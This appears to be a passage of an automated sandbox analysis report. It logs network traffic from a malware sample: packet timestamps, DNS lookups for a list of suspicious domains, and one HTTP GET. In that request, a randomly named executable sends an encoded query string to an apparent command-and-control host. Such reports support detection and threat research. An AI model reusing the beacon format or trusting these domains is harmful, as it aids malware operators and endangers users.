                                                                            Nov 22, 2024 07:51:32.508850098 CET804995691.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:32.510996103 CET4995680192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:32.514878035 CET4995680192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:32.634591103 CET804995691.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:33.838655949 CET804995691.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:33.838851929 CET804995691.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:33.839246035 CET4995680192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:34.020629883 CET4995680192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:35.039479017 CET4996280192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:35.159126043 CET804996291.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:35.159219980 CET4996280192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:35.161812067 CET4996280192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:35.281327009 CET804996291.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:36.532432079 CET804996291.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:36.532551050 CET804996291.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:36.532685995 CET4996280192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:36.678872108 CET4996280192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:37.695847988 CET4996880192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:37.815413952 CET804996891.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:37.819041014 CET4996880192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:37.822875977 CET4996880192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:37.942799091 CET804996891.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:37.942811012 CET804996891.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:37.942819118 CET804996891.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:37.942827940 CET804996891.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:37.942950010 CET804996891.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:37.942959070 CET804996891.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:37.942966938 CET804996891.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:37.942975998 CET804996891.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:37.942982912 CET804996891.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:39.352454901 CET4996880192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:39.455666065 CET804996891.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:39.455713034 CET4996880192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:39.455741882 CET804996891.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:39.455766916 CET804996891.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:39.455799103 CET4996880192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:39.455799103 CET4996880192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:39.472045898 CET804996891.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:39.472364902 CET4996880192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:40.368846893 CET4997480192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:40.488466978 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:40.488643885 CET4997480192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:40.490550041 CET4997480192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:40.610093117 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.053124905 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.053143024 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.053155899 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.053251982 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.053262949 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.053272963 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.053283930 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.053296089 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.053307056 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.053319931 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.053332090 CET4997480192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:42.053426981 CET4997480192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:42.053427935 CET4997480192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:42.173207045 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.173238039 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.173428059 CET4997480192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:42.177143097 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.223548889 CET4997480192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:42.254322052 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.254470110 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.254631996 CET4997480192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:42.258418083 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.258529902 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.258657932 CET4997480192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:42.266841888 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.266985893 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.267182112 CET4997480192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:42.275259018 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.275310040 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:42.275548935 CET4997480192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:42.278879881 CET4997480192.168.2.491.195.240.94
                                                                            Nov 22, 2024 07:51:42.398338079 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:56.118884087 CET5001080192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:51:56.238504887 CET805001066.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:51:56.238635063 CET5001080192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:51:56.242892981 CET5001080192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:51:56.362382889 CET805001066.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:51:57.569866896 CET805001066.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:51:57.569926023 CET805001066.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:51:57.569968939 CET5001080192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:51:57.758893967 CET5001080192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:51:58.774684906 CET5001780192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:51:58.894187927 CET805001766.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:51:58.894296885 CET5001780192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:51:58.897321939 CET5001780192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:51:59.016807079 CET805001766.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:00.185381889 CET805001766.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:00.185403109 CET805001766.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:00.185604095 CET5001780192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:00.411158085 CET5001780192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:01.431248903 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:01.550877094 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.550996065 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:01.553869009 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:01.673835993 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.673907995 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.673943996 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.673993111 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.674112082 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.674207926 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.674312115 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.674340963 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.674401045 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:03.107714891 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:03.411087036 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:03.439923048 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:03.439964056 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:03.439991951 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:03.440046072 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:03.442075968 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:03.442118883 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:03.442514896 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:03.442605972 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:03.531466007 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:03.531589985 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:04.125941038 CET5001980192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:04.247028112 CET805001966.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:04.247258902 CET5001980192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:04.249063015 CET5001980192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:04.368619919 CET805001966.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:05.483556032 CET805001966.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:05.483649969 CET805001966.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:05.483778954 CET5001980192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:05.489032030 CET5001980192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:05.609091043 CET805001966.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:11.384088039 CET5002080192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:11.503741980 CET8050020195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:11.503843069 CET5002080192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:11.506185055 CET5002080192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:11.626734018 CET8050020195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:12.871778965 CET8050020195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:12.872144938 CET8050020195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:12.872201920 CET5002080192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:13.020571947 CET5002080192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:14.039726973 CET5002180192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:14.159259081 CET8050021195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:14.161061049 CET5002180192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:14.165221930 CET5002180192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:14.284714937 CET8050021195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:15.474142075 CET8050021195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:15.474369049 CET8050021195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:15.474452972 CET5002180192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:15.676908016 CET5002180192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:16.695655107 CET5002280192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:16.815228939 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.815352917 CET5002280192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:16.819015980 CET5002280192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:16.938747883 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.938766003 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.938791990 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.938803911 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.938829899 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.938925982 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.938939095 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.939101934 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.939116001 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:18.324264050 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:18.324315071 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:18.324544907 CET5002280192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:18.333029985 CET5002280192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:19.352854967 CET5002380192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:19.472328901 CET8050023195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:19.472431898 CET5002380192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:19.474291086 CET5002380192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:19.594122887 CET8050023195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:20.826541901 CET8050023195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:20.826776981 CET8050023195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:20.826824903 CET5002380192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:20.830018997 CET5002380192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:20.949686050 CET8050023195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:43.268219948 CET5002480192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:43.387768030 CET8050024217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:43.387845993 CET5002480192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:43.390568018 CET5002480192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:43.510050058 CET8050024217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:44.586931944 CET8050024217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:44.587518930 CET8050024217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:44.587580919 CET5002480192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:44.895643950 CET5002480192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:45.914364100 CET5002580192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:46.035554886 CET8050025217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:46.037342072 CET5002580192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:46.041043043 CET5002580192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:46.160571098 CET8050025217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:47.290750980 CET8050025217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:47.292061090 CET8050025217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:47.292110920 CET5002580192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:47.551882982 CET5002580192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:48.573008060 CET5002680192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:48.693116903 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.693340063 CET5002680192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:48.697500944 CET5002680192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:48.817122936 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.817186117 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.817286968 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.817357063 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.817378998 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.817397118 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.817462921 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.817475080 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.817519903 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:49.939519882 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:49.940186977 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:49.941492081 CET5002680192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:50.223387957 CET5002680192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:51.226980925 CET5002780192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:51.346633911 CET8050027217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:51.346713066 CET5002780192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:51.349225998 CET5002780192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:51.468784094 CET8050027217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:52.599158049 CET8050027217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:52.599400997 CET8050027217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:52.599726915 CET5002780192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:52.601929903 CET5002780192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:52.721409082 CET8050027217.196.55.202192.168.2.4

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 22, 2024 07:49:26.516429901 CET6135253192.168.2.41.1.1.1
                                                                            Nov 22, 2024 07:49:27.329732895 CET53613521.1.1.1192.168.2.4
                                                                            Nov 22, 2024 07:49:44.102190971 CET6200253192.168.2.41.1.1.1
                                                                            Nov 22, 2024 07:49:44.522835970 CET53620021.1.1.1192.168.2.4
                                                                            Nov 22, 2024 07:49:52.618645906 CET6426753192.168.2.41.1.1.1
                                                                            Nov 22, 2024 07:49:53.371068001 CET53642671.1.1.1192.168.2.4
                                                                            Nov 22, 2024 07:50:08.347546101 CET5689653192.168.2.41.1.1.1
                                                                            Nov 22, 2024 07:50:08.585517883 CET53568961.1.1.1192.168.2.4
                                                                            Nov 22, 2024 07:50:16.649967909 CET6518553192.168.2.41.1.1.1
                                                                            Nov 22, 2024 07:50:17.436307907 CET53651851.1.1.1192.168.2.4
                                                                            Nov 22, 2024 07:51:32.008706093 CET6427753192.168.2.41.1.1.1
                                                                            Nov 22, 2024 07:51:32.386326075 CET53642771.1.1.1192.168.2.4
                                                                            Nov 22, 2024 07:51:47.290138006 CET5890953192.168.2.41.1.1.1
                                                                            Nov 22, 2024 07:51:47.506942987 CET53589091.1.1.1192.168.2.4
                                                                            Nov 22, 2024 07:51:55.571535110 CET5382353192.168.2.41.1.1.1
                                                                            Nov 22, 2024 07:51:56.113092899 CET53538231.1.1.1192.168.2.4
                                                                            Nov 22, 2024 07:52:10.574915886 CET6259353192.168.2.41.1.1.1
                                                                            Nov 22, 2024 07:52:11.380902052 CET53625931.1.1.1192.168.2.4
                                                                            Nov 22, 2024 07:52:25.837023020 CET6109353192.168.2.41.1.1.1
                                                                            Nov 22, 2024 07:52:26.012783051 CET53610931.1.1.1192.168.2.4
                                                                            Nov 22, 2024 07:52:34.086966991 CET5686653192.168.2.41.1.1.1
                                                                            Nov 22, 2024 07:52:34.467658043 CET53568661.1.1.1192.168.2.4
                                                                            Nov 22, 2024 07:52:42.526237011 CET5499053192.168.2.41.1.1.1
                                                                            Nov 22, 2024 07:52:43.265321970 CET53549901.1.1.1192.168.2.4
                                                                            Nov 22, 2024 07:52:57.618638039 CET5380753192.168.2.41.1.1.1
                                                                            Nov 22, 2024 07:52:57.855349064 CET53538071.1.1.1192.168.2.4
                                                                            Nov 22, 2024 07:53:06.369107962 CET5371553192.168.2.41.1.1.1
                                                                            Nov 22, 2024 07:53:06.710083961 CET53537151.1.1.1192.168.2.4

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Nov 22, 2024 07:49:26.516429901 CET192.168.2.41.1.1.10x5c66Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:49:44.102190971 CET192.168.2.41.1.1.10x4fb2Standard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:49:52.618645906 CET192.168.2.41.1.1.10x28b5Standard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:50:08.347546101 CET192.168.2.41.1.1.10x5ef0Standard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:50:16.649967909 CET192.168.2.41.1.1.10x7f92Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:51:32.008706093 CET192.168.2.41.1.1.10x9c86Standard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:51:47.290138006 CET192.168.2.41.1.1.10x251Standard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:51:55.571535110 CET192.168.2.41.1.1.10x5e89Standard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:52:10.574915886 CET192.168.2.41.1.1.10xef61Standard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:52:25.837023020 CET192.168.2.41.1.1.10x8d14Standard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:52:34.086966991 CET192.168.2.41.1.1.10xcaa9Standard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:52:42.526237011 CET192.168.2.41.1.1.10x822dStandard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:52:57.618638039 CET192.168.2.41.1.1.10xb7faStandard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:53:06.369107962 CET192.168.2.41.1.1.10x52eaStandard query (0)www.k9vyp11no3.cfdA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Nov 22, 2024 07:49:27.329732895 CET1.1.1.1192.168.2.40x5c66No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:49:44.522835970 CET1.1.1.1192.168.2.40x4fb2Name error (3)www.kasegitai.tokyononenoneA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:49:53.371068001 CET1.1.1.1192.168.2.40x28b5No error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:50:08.585517883 CET1.1.1.1192.168.2.40x5ef0Name error (3)www.antonio-vivaldi.mobinonenoneA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:50:17.436307907 CET1.1.1.1192.168.2.40x7f92No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 22, 2024 07:50:17.436307907 CET1.1.1.1192.168.2.40x7f92No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 22, 2024 07:50:17.436307907 CET1.1.1.1192.168.2.40x7f92No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:51:32.386326075 CET1.1.1.1192.168.2.40x9c86No error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:51:47.506942987 CET1.1.1.1192.168.2.40x251Name error (3)www.liangyuen528.comnonenoneA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:51:56.113092899 CET1.1.1.1192.168.2.40x5e89No error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:52:11.380902052 CET1.1.1.1192.168.2.40xef61No error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 22, 2024 07:52:11.380902052 CET1.1.1.1192.168.2.40xef61No error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:52:26.012783051 CET1.1.1.1192.168.2.40x8d14Name error (3)www.donnavariedades.comnonenoneA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:52:34.467658043 CET1.1.1.1192.168.2.40xcaa9Name error (3)www.660danm.topnonenoneA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:52:43.265321970 CET1.1.1.1192.168.2.40x822dNo error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 22, 2024 07:52:43.265321970 CET1.1.1.1192.168.2.40x822dNo error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:52:57.855349064 CET1.1.1.1192.168.2.40xb7faName error (3)www.joyesi.xyznonenoneA (IP address)IN (0x0001)false
                                                                            Nov 22, 2024 07:53:06.710083961 CET1.1.1.1192.168.2.40x52eaName error (3)www.k9vyp11no3.cfdnonenoneA (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • www.3xfootball.com
                                                                            • www.goldenjade-travel.com
                                                                            • www.magmadokum.com
                                                                            • www.rssnewscast.com
                                                                            • www.techchains.info
                                                                            • www.elettrosistemista.zip
                                                                            • www.empowermedeco.com

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449736154.215.72.110805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:49:27.460985899 CET514OUTGET /fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.3xfootball.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 22, 2024 07:49:29.052217007 CET691INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Fri, 22 Nov 2024 06:49:28 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
